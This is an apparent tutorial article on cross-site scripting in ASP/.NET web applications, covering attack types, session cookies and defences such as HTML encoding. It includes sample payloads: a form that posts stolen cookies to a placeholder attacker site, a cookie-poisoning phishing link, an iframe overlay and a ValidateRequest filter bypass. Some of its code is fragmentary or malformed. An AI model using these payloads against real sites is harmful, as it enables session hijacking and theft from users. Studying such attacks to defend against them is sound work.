The HTML output used to create the front end of the web applications generally contain some client side executable code. This code runs at the client end, and helps to give some performance boost as well as common validations to be performed at the client end. Another use of this code could be showing ‘hot images’, i.e. mouse rollover images at the client end.
src file (
src helps the code to look clean. So here we can understand that for the browser,
<script> tag works as something to be run locally. Please don’t confuse this with
<script runat =”server”> of the .NET languages. For an example, the following script will produce a simple hello on to the browser of the client. This script will use the client side OS API to show the message box.
The problem is mixing of the data with the code. We can say that the HTML is the data for the browser which when processed by the browser results in beautiful HTML in action, however the
<script> tag is the code embedded in the data.
Cross site scripting which is also referred as XSS (since CSS will make confusion with Cascading Style Sheet) takes the advantage of the above said problem i.e. mixing of data with code. This is generally applicable where an application takes input from the end-user and displays the same input to the browser. Or where application takes HTML input from the user and shows this input to the other users. For e.g., let us consider a dummy search page. It works using the GET method of form post. This page consist of one textbox, one button, one dynamically generated table and one heading which tells about the text on which the search is made. Suppose heading has got some text like ‘Your search on’ + <USERINPUT> + ‘returned following results:’. Now if user searches for ‘donuts’, he will be shown the results in a dynamic table, and the text will have the following:
Your search on donuts returned following results:
If the search text is being shown without taking care of the XSS and some malicious users search on text like
<script>alert(‘hello’)</script>, then the header label instead of showing:
Your search on <script>alert(‘hello’)</script> returned following results:
will execute the script and a message box with hello will pop up there. And now if the malicious user sends the URL (as this page works on the GET method, so URL will be easily available here) to some victim, then this message box will appear in his browser.
There are two ways in which one user can see the data sent by another user. He can see that data immediately (chat sessions) or he can see it later (archived). So based on the above fact, we can say that XSS can be categorized in two categories:
- Persistent attack
- Non persistent attack
In persistent attack, the malicious user will give the input to some part of the application and later this input will be available to public or say other users. The common form of this kind of application could be dating sites, sites asking for the users for open ended comments, sites asking the user to fill guest books. May be for the purpose of freedom, the application has overlooked the danger of the XSS attack and allowed the user to put HTML so that the end user can beautify his input by putting the tags. A malicious user can take the advantage of this freedom and put the client side script in the response he is giving. After the malicious user saves his input, the information provided by him becomes part of the database and later any user who is viewing this info may fall as a victim.
Non persistent attack
In these attacks, the data input by the malicious user is directly presented to the user. There is no intermediate persistent storage involved in it. This attack generally takes place in the form of malformed URL being sent to the victims. There could be applications like HTML based chat where the user is allowed to put HTML data. However HTML chat which is using a text box to show the output is safe as a text box will only show the contents of the script instead of executing the script.
Before going in to the details of what an attacker can do, let us first see how the web works.
WWW relies on the HTTP protocol. HTTP requests mainly consist of two parts: message header and message body. For the description of these parts, please refer to the RFC for HTTP. The header contains the general information like client software name, referrer, executing script path, while the body is made up of name pair values of the controls on the form. (A form can be, the HTML way of making a common request to go on a particular web address.) HTTP is a stateless protocol. It means that the server can not distinguish between two clients. To overcome this issue and let the server determine client X from client Y, we have the concept of session on the web servers. Session is based on an ID known as session ID. So each time clients send their session ID to the server so that they can be recognized by the server. This ID is unique for each client and this ID is time bound too. That means this ID is valid only for a given time slot. So to return this ID back to the server, the client can either put it in the part of the request or he can put it in the header of the request. If the session ID is in the request, then it is non cookie based usage. If the session ID is part of the headers, then it is a cookie based usage. ** Cookies may contain any data like the application logic and are used to maintain state between pages in the otherwise stateless HTTP protocol.
So the point I am trying to make here is, if user A has the cookie which the server sent to user B and user A uses this cookie, then for the server he is user B not the user A. An attacker tries to exploit this stateless architecture by doing a cookie theft using the XSS attack. After attacker gains the cookie, it is just a matter of time to send this cookie to the web server and spoof the identity of some other user. To get the cookie using a script attack, attacker needs to craft a special form which posts back the value of
document.cookie to his site.
document.cookie is used to manipulate the existing cookie value with some script. However this attack is possible if the application blindly writes the cookie value to the output stream.
Using the XSS attack, a clever attacker can fool the end-user to get the credit card number. For this the attacker can make use of the ‘
a href’ tag inside his vulnerable script, this link may take the user from your site to the attacker’s site where he can show a screen similar to the spoofed site and ask for a donation or upgrade of the membership. The amount could be as low as 1$ because not the amount but the credit card number is the main target for the attacker. Phishing attack is one such attack.
Attacker can use one
IFRAME tag with height and width set to 100% and then instead of your page, the end-user will be presented with the attacker’s page. So for the end user, it will be your site as he is able to see your address on the address bar but actually the attacker is playing with him.
DOS stands for the denial of services attack. To do a DOS attack on a particular page of your site, attacker can make a script which will run at a particular time interval, say 20 ms, and then execute the code. In this case, a simple message box is enough. Though, not a deadly attack, it still frustrates the customer visiting your ecommerce site. Showing comments of buyers may be a trap here.
The attack list is continuous and ongoing and it may even cause the theft of local files data from the system. May be getting a Trojan downloaded to the client without even clicking on any link.
Script injection and the ValidateRequest = ‘true’ page tag of ASP.NET:
ValidationRequest = true generally checks for the insecure input from the client and it bans any HTML tag by default. However, when I wrote this article, it was not checking for the HTML tag passed as <%00 tag here>. E.g.
<%00 font>. Making it to
false is a good idea if you are expecting the client to fill the HTML input. However, you should thoroughly check the input for any script tag.
Using Regex: Using regular expressions to check for the client side input is a good idea, but the attacker may pass the data in encoded form rather than sending it in plain text format.
Using server.HTMLEncode (.NET): Though this is a function from .NET, many of the modern web technologies provide similar kinds of functions. You can use these functions to show the input from one user to another user. These functions convert HTML tags in to the encoded form. So, instead of executing, the script gets rendered on to the page. So basically here I mean that encode the incoming < and > signs.
Using the double quotes: If you use the user input to generate a link than instead of rendering the plain text, you can put the input in double quotes and show it to the user. E.g.,
<A href="<user input>">. This approach works as the escape character in the client side script in a single quote not the double quote.
** You also need to take care about the encoding issues as the attacker may encode the exploit string and your prevention may fail to catch it.
Examples on XSS
To make it simple, we will assume one code snippet of ASP application which is vulnerable to the XSS attack
SearchString parameter value. Here, I have taken the ASP example, however the cross site vulnerability is very common to all most all web technologies as well as complied script files (.chm). The point is, any application which is mixing HTML data with script code and ignoring the user input sanitary, is susceptible to the XSS. Let us see how attacks is going to exploit the above query string variable.
Please also take care that query string is just one of the methods. Here, instead of the query string, the input may come from the cookie or database and if the input contains the exploit string, it can cause problems. The above shown example is the type of non persistent attack. However, if instead of query string, input was from cookie or database, it will be persistent attack session highjacking. To highjack the session, attacker needs to obtain the cookie from the victim. So he needs to create one form and make it submit to his site. This form will contain the value of the cookie in it, since the attacker knows of his site action, he knows which cookie is for which site.
</form> <form name=’a’ action = ‘attackersiteaddress’ method =’post’>
<input type = hidden value= ‘<script> + document.cookie + </script>’>
The above script will post the cookie value to the attacker site and then he can form one request and attach cookie value to it and gain access to the site. The above script can be made to run on the various events like page load, mouse over, mouse click etc. to submit the form, or attacker can simply use the
setTimeout method to make the form post.
Cookie poisoning: Cookie poisoning deals with corrupting the values of the cookie and also some part of the application is relying on the cookie to set the
response.write. In our example, let us assume that cookies are used to store the value of the last search done by the user along with the date-time. Cookie poisoning generally includes the offline analysis of the site by the attacker. I.e., the attacker will first visit the site, then he will analyze the various cookies which got downloaded and then craft the attack.
<script> document.cookie.userlastsearch = ‘<A href=”attackersiteAddress”>
you have won a random prize please click here to continue</A>’
Here the attacker has updated the value of the last search with an
href pointing to his site. There he may ask the user to ‘login again to claim your prize’. The cookie here is poisoned and the user will be affected each time he visits the site and unless he deletes his cookie cache he will see this message. So initially the attacker can bait him with 5$ and later ask him to pay 50$ for some wonderful product which your site is giving him.
IFRAME is an HTML tag and this even doesn’t need a script tag to display. The
IFRAME element defines an inline frame which can include the external objects including other HTML documents. So the attacker will simply write a statement like this:
<iframe SRC=”attacker site” height = “100%” width =”100%”>
And there he can fool the user by showing the UI which has the same look and feel as that of your site.
DOS Attack: There is nothing but a simple function call to
setTimeout with the time interval set, say 10, which will cause some code snippet to execute again and again. However, this code snippet could be as simple as one user-friendly OK dialog box or redirection to some other site from your site. If the user does so, that particular page where attack has been made will become unavailable or horribly available to the end user. Think a scenario where you are using the cookie to set some session value (this seems to be a bad design), then wherever you have used the session value to render the message to the user, all those pages will be unavailable.
Finally, I would like to conclude with one sentence that if you have a weapon and a victim, it all depends on you how you want to kill the victim.